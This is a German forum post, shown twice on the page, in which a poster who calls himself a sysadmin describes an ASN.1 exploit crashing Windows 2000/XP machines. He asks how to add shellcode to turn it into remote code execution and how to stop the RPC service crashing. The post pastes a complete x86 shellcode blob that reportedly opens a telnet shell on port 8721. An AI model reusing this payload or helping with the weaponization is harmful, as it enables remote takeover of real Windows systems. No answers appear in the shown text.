[HaBo]

hunterb21 · 17.02.04, 13:35

hallo

nun gibts ja den ersten exploit für die erst kürzlich entdeckte sicherheitslücken von windows. habe den quellcode interesse halber kompiliert, und mußte mit erstaunen feststellen, dass er mir jedes win2000 und xp system über das netzwerk zum absturz brachte.

aus diesem grund hab ich mir das ganze mal genauer angesehen und nun sind einige fragen aufgetaucht.

um mit diesem exploit nun anderen code auszuführen muss ja neuer shellcode eingfügt werden. habe dann auch hier einen platzhalter dafür gefunden:

/* mechToken: NTLMSSP (room for shellcode here) */

und noch hier:

n2 += 2000; /* heap padding for shellcode */

nur wenn ich den neuen shellcode einfügen hat sich nichts geändert.

hier ein shellcode beispiel: er startet telnet auf port 8721

"\xe8\x38\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\ x79\xe5\x49\x86"
"\x49\xa4\xad\x2e\xe9\xa4\x1a\x70\xc7\xd9\x09\xf5\ xad\xcb\xed\xfc"
"\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2\x73\xad\xd9\x05\ xce\x72\xfe\xb3"
"\x16\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c\x00\ x01\x5b\x54\x89"
"\xe5\x89\x5d\x00\x6a\x30\x59\x64\x8b\x01\x8b\x40\ x0c\x8b\x70\x1c"
"\xad\x8b\x58\x08\xeb\x0c\x8d\x57\x2c\x51\x52\xff\ xd0\x89\xc3\x59"
"\xeb\x10\x6a\x08\x5e\x01\xee\x6a\x0a\x59\x8b\x7d\ x00\x80\xf9\x06"
"\x74\xe4\x51\x53\xff\x34\x8f\xe8\x90\x00\x00\x00\ x59\x89\x04\x8e"
"\xe2\xeb\x31\xff\x66\x81\xec\x90\x01\x54\x68\x01\ x01\x00\x00\xff"
"\x55\x20\x57\x57\x57\x57\x47\x57\x47\x57\xff\x55\ x1c\x89\xc3\x31"
"\xff\x57\x57\x68\x02\x00\x22\x11\x89\xe6\x6a\x10\ x56\x53\xff\x55"
"\x18\x57\x53\xff\x55\x14\x57\x56\x53\xff\x55\x10\ x89\xc2\x66\x81"
"\xec\x54\x00\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\ xab\x89\xd7\xc6"
"\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x7c\x24\x48\ x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\ x51\x41\x51\x49"
"\x51\x51\xff\x75\x00\x51\xff\x55\x30\x89\xe1\x68\ xff\xff\xff\xff"
"\xff\x31\xff\x55\x2c\x57\xff\x55\x0c\xff\x55\x28\ x53\x55\x56\x57"
"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\ xea\x8b\x4a\x18"
"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\ xee\x31\xff\xfc"
"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\ xeb\xf2\x3b\x7c"
"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\ x4b\x8b\x5a\x1c"
"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\ xea\x5f\x5e\x5d"
"\x5b\xc2\x08\x00"

hat da jemand ne idee?

weiterhin bringt der exploit den rpc-server zum absturz, kann man das verhindern?
sonst muss man ja nach jedem test den computer neu starten.

bitte versteht mich nicht falsch, ich will hier keinen virus oder sonstigen mist programmieren. ich find es nur interessant und möchte es verstehen. bin sysadmin in einer firma...

thx hunter

Anzeige

- Anzeige -

17.02.04, 13:35	#1 (permalink)
hunterb21 Registriert seit: 17.02.04 Likes: 0	Versuche mit dem ASN.1 Remote DoS Exploit Anzeige hallo nun gibts ja den ersten exploit für die erst kürzlich entdeckte sicherheitslücken von windows. habe den quellcode interesse halber kompiliert, und mußte mit erstaunen feststellen, dass er mir jedes win2000 und xp system über das netzwerk zum absturz brachte. aus diesem grund hab ich mir das ganze mal genauer angesehen und nun sind einige fragen aufgetaucht. um mit diesem exploit nun anderen code auszuführen muss ja neuer shellcode eingfügt werden. habe dann auch hier einen platzhalter dafür gefunden: /* mechToken: NTLMSSP (room for shellcode here) / und noch hier: n2 += 2000; / heap padding for shellcode */ nur wenn ich den neuen shellcode einfügen hat sich nichts geändert. hier ein shellcode beispiel: er startet telnet auf port 8721 "\xe8\x38\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\ x79\xe5\x49\x86" "\x49\xa4\xad\x2e\xe9\xa4\x1a\x70\xc7\xd9\x09\xf5\ xad\xcb\xed\xfc" "\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2\x73\xad\xd9\x05\ xce\x72\xfe\xb3" "\x16\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c\x00\ x01\x5b\x54\x89" "\xe5\x89\x5d\x00\x6a\x30\x59\x64\x8b\x01\x8b\x40\ x0c\x8b\x70\x1c" "\xad\x8b\x58\x08\xeb\x0c\x8d\x57\x2c\x51\x52\xff\ xd0\x89\xc3\x59" "\xeb\x10\x6a\x08\x5e\x01\xee\x6a\x0a\x59\x8b\x7d\ x00\x80\xf9\x06" "\x74\xe4\x51\x53\xff\x34\x8f\xe8\x90\x00\x00\x00\ x59\x89\x04\x8e" "\xe2\xeb\x31\xff\x66\x81\xec\x90\x01\x54\x68\x01\ x01\x00\x00\xff" "\x55\x20\x57\x57\x57\x57\x47\x57\x47\x57\xff\x55\ x1c\x89\xc3\x31" "\xff\x57\x57\x68\x02\x00\x22\x11\x89\xe6\x6a\x10\ x56\x53\xff\x55" "\x18\x57\x53\xff\x55\x14\x57\x56\x53\xff\x55\x10\ x89\xc2\x66\x81" "\xec\x54\x00\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\ xab\x89\xd7\xc6" "\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x7c\x24\x48\ x89\x7c\x24\x4c" "\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\ x51\x41\x51\x49" "\x51\x51\xff\x75\x00\x51\xff\x55\x30\x89\xe1\x68\ xff\xff\xff\xff" "\xff\x31\xff\x55\x2c\x57\xff\x55\x0c\xff\x55\x28\ x53\x55\x56\x57" "\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\ xea\x8b\x4a\x18" "\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\ xee\x31\xff\xfc" "\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\ xeb\xf2\x3b\x7c" "\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\ x4b\x8b\x5a\x1c" "\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\ xea\x5f\x5e\x5d" "\x5b\xc2\x08\x00" hat da jemand ne idee? weiterhin bringt der exploit den rpc-server zum absturz, kann man das verhindern? sonst muss man ja nach jedem test den computer neu starten. bitte versteht mich nicht falsch, ich will hier keinen virus oder sonstigen mist programmieren. ich find es nur interessant und möchte es verstehen. bin sysadmin in einer firma... thx hunter

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Remote Exploit für Win 2003	brave_snoopy	(In)security allgemein	3	06.04.06 23:19
Versuche 2 Festplatte als slave anzumelden	Pseudokrup	Hardware Probleme	9	01.09.05 23:34
Internet Explorer Remote Exploit	mack\|dawg	Virenschutz · Tools & Aggressive Software	1	26.07.04 20:24
Endlose Versuche zur Konfiguration einer (Homeoffice) analoge Telefonanlage	Tueftler	Off topic-Zone	0	27.08.03 21:10

[HaBo]

Versuche mit dem ASN.1 Remote DoS Exploit